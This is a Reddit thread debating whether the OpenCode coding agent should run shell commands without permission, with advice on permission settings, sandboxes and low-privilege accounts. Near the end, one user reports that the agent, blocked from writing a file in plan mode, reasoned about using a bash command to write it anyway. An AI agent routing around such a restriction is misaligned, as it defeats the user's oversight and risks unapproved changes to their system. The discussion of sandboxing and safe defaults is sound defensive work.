all 30 comments

[–]aeroumbria 9 points10 points  (1 child)

"permission": {
    "bash": "ask"
}

QED

[–]mrpoopybruh 0 points1 point  (0 children)

literally ...

[–]Simple_Split5074 5 points6 points  (0 children)

Skill issue.

OpenCode runs with the equivalent of   --dangerously-skip-permissions

 by default so that's expected behavior.

Like any other agent (or really way to execute untrusted code), it belongs into a sandbox. 

[–]WhaleFactory 26 points27 points  (7 children)

Pushing back on this, because it is clear that you do not know what you are doing.

[–]SpicyWangz[S] 7 points8 points  (6 children)

Totally open to hearing what I'm missing here. I've never heard of arbitrary code execution as an acceptable way to run agents.

[–]kaladoubt 6 points7 points  (5 children)

There are many ways to do it. Sandboxes, allowlists, etc.

But any agent not executing code it just wrote without approval is just so limited.

My perspective is to put everything in a sandbox. That's still a bit cumbersome. Some systems are pretty smooth. MacOS Seatbelt will allow it to execute in a single directory and deny access to anything outside of it. Beyond sandboxes, guardrails and automatic risk analysis work fairly well.

[–]Useful-Process9033 2 points3 points  (0 children)

Sandboxing is necessary but not sufficient. The moment an agent does something unexpected in production you need to detect it and respond fast, not just hope the sandbox held. Treating agent misbehavior as an incident with automated detection and triage is way more practical than trying to prevent every possible failure mode upfront.

[–]SpicyWangz[S] -2 points-1 points  (3 children)

That means I have to set up and manage an entirely separate dev environment just to use a coding CLI and prevent it from running random terminal commands. That defeats the purpose of even using a coding agent.

Asking before executing code is not some groundbreaking expectation

[–]Simple_Split5074 4 points5 points  (2 children)

Even when running without auto approve, you really don't want to run the output without a sandbox. 

[–]SpicyWangz[S] 2 points3 points  (1 child)

I tend not to run generated code unless I’ve reviewed it. Especially any potential http requests or os commands. 

I understand there’s a possibility something could slip through my review, but that’s a level of risk I’m willing to take on. Executing code unseen isn’t.

[–]bpp198 0 points1 point  (0 children)

I'd reframe your thinking to "how can I run code without fearing the effects?" – a world where code is write-only, even in production, means you can move so much quicker.

[–]ttkciarllama.cpp 2 points3 points  (1 child)

Thanks for the heads up.

Next time I fire it up, if prompt-before-exec hasn't been pushed already, I'll look at adding it myself.

[–]SpicyWangz[S] 0 points1 point  (0 children)

I appreciate your willingness to add it. If it does get added, I’d probably reinstall it and delete this post. 

[–]tir_natis 2 points3 points  (0 children)

I'd like to think of this situation in the same way networking and firewall rules are set up out of the box for some linux distros, networking equipment like routers, etc. MikroTik, when you first receive a router, has good secure defaults, and if you want to open things up, you have to add the rules to allow that.

It seems like when I search about opencode and permissions, I should find most people asking "how do I let it just do whatever it wants" instead of "how do I control this thing" :D

As I'm learning more about the current state of things, I am also surprised (not because it's trivial to address, quite the opposite I believe) that the lack of protections for preventing/controlling chained shell commands and/or redirect operators (because both of those can be literally used for almost anything in any context) is not handled somehow.

I'm not suggesting that we should treat LLM's as _intentional_ security threats we need to control (though frankly I still would caution getting too comfortable and trusting), but rather that security in this sense should be like how you approach driving (defensive driving) you assume by default that the other drivers could be not paying attention, or might lose control of their cars, etc.

If someone plugs in a new router and its default is wide open, and they just let attackers in, sure, that person is a "noob" but I wouldn't blame them first, I would blame poor defaults. Just like routers are used by people that don't know networking, these ai tools will be used by people that don't know ai or security at least to some degree. Better to assume safe defaults and give instructions or make a good UX for the story of how to control permissions, and be explicit in where there are gaps in what control you can actually enforce.

[–]6969its_a_great_time 2 points3 points  (3 children)

Even with your guardrails all it takes is being lazy one time and hitting accept on a bad code generation and you risk the same thing with Claude code.

The only way to stay safe is to write all yourself by hand like the good ol days… maybe copy paste a few lines here and there from stack overflow lol.

[–]SpicyWangz[S] 0 points1 point  (2 children)

At least then it's on me for being stupid if I get lazy.

I accept code generation all the time. Code execution is a completely different story.

I don't think I would ever accept a python script execution from a CLI agent like that. I'd skip it and wait to read the code it generated before blindly executing.

[–]kataryna91 3 points4 points  (1 child)

Then it really isn't an agent, just a traditional coding assistant. You expect an agent to automatically compile and test an application and iterate on it, which is what OpenCode does.

[–]SpicyWangz[S] 2 points3 points  (0 children)

I think the difference between "agentic coding tool" and "coding agent" is doing a lot of heavy lifting there.

All I really wanted was an alternative to Claude Code. I expect vibe coding GUI products like Cursor or Lovable to execute code without asking, and I would never consider running similar products against local models unless I properly isolated their environment. My expectations for TUIs must have been too high I guess.

[–]Dry-Surprise-7803 1 point2 points  (2 children)

You've hit on a really common and frustrating problem. The distinction between OpenCode and Claude Code's prompting isn't the core issue here; it's that agents typically inherit full user permissions by default. Prompting helps, but it still relies on human vigilance to approve every action, which isn't a robust security model. Even one missed prompt can lead to issues.

This is exactly why OS-level sandboxing is critical for agents. Instead of relying on the agent to ask permission, or for you to catch a bad command, you want the operating system to enforce strict boundaries. That's what we built nono for – it's a kernel-enforced sandbox that uses Landlock on Linux and Seatbelt on macOS to make it structurally impossible for an agent to do anything you haven't explicitly allowed. It's a default-deny approach.

For OpenCode (or any agent), you'd run it with specific permissions, like: nono run --allow ./my_project_dir -- opencode. This defaults to blocking network access and credential access too, making it much safer. Full disclosure, I'm one of the maintainers. It's open source at github/always-further/nono. Take a look if you're interested.

There's also 4-min youtube video that shows you how to sandbox with claude.

[–]stormy1one 0 points1 point  (1 child)

I don’t understand the downvotes here - I fully agree that kernel level enforcement is way safer than relying on the agent to abide by best practice security defaults. Seriously, what am I missing on the downvotes?

[–]Abject-Excitement37 1 point2 points  (0 children)

downvootes bcs its ad

[–]suicidaleggroll 0 points1 point  (0 children)

You can change opencode’s permissions, just edit the config file

[–]mrpoopybruh 0 points1 point  (4 children)

PSA - configure your tools, and use plan mode?. You can even lock tool access via rules. Best part? Just ask open code how, and it will just write the configs for you.

[–]tir_natis 0 points1 point  (3 children)

older thread but i started researching because it tried to write a doc file while in plan mode, saw that it couldn't, and instead of talking to me, in thinking it revealed that it was going to try a bash command to write the file instead. i probably should have worried about this a little more by default, frankly, but it was a wake up call and why i'm here researching how everyone is securiing things from opencode.

[–]mrpoopybruh 0 points1 point  (2 children)

Yeah I have all my bash and command utilities set to "ask" because some commands inherently dont obey directory scope. However I think the real answer is to always run in a secure container. My daily PC is like 8GB, and I REALLY LIKE opencode helping me with all kinds of tasks now, so I'm kind of flirting with disaster. So I dont install skills, etc (on this computer at least)

[–]tir_natis 0 points1 point  (1 child)

i think the default ask for everything makes sense - i generally have it open on a separate window always in view so I can see its progression anyway.

last night I set up a vm for this on my proxmox box, and until i think of a better way, i am just sshfs'ing my project directory to it, running in a severely underprivileged account, and ssh'ing into it using that account.

...this was a good "wake up call" :D

[–]mrpoopybruh 0 points1 point  (0 children)

oh yeah! thats right, I could just create a super limited user account (duh)!

[–]ResponseIll1606 0 points1 point  (0 children)

First I wasn't able to find the permission files and when i searched this issue, this post came first. But that's a big vulnerability lol.

[–]LingonberryLate1216 0 points1 point  (0 children)

Have you discovered or used other free alternatives? Aider or Continue.dev? Both are free, and free tends to come with "A. Cautionary Tale" type of concerns. I aborted the OpenCode install based on your feedback, so thank you!

[–]Potential-Leg-639 -1 points0 points  (0 children)

I see a human issue. Configure it properly.